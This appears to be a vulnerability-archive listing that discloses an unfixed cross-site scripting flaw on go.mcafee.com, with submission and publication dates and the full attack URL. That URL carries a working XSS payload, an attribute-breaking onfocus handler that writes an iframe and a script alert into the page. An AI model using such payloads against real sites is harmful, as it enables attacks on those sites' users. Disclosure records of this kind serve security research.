Security researcher Zeitjak, has submitted on 14/04/2011 a cross-site-scripting (XSS) vulnerability affecting go.mcafee.com, which at the time of submission ranked 1137 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/04/2011 |
Date published: 13/01/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: Zeitjak |
Domain: go.mcafee.com |
Category: XSS |
Pagerank: 1137 |
URL: http://go.mcafee.com/activation.cfm?firewall_id=" style="background-image:url('http://i.imgur.com/oHp8A.gif')" onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25 width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS /)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar |
Click here to view the mirror
|
|
|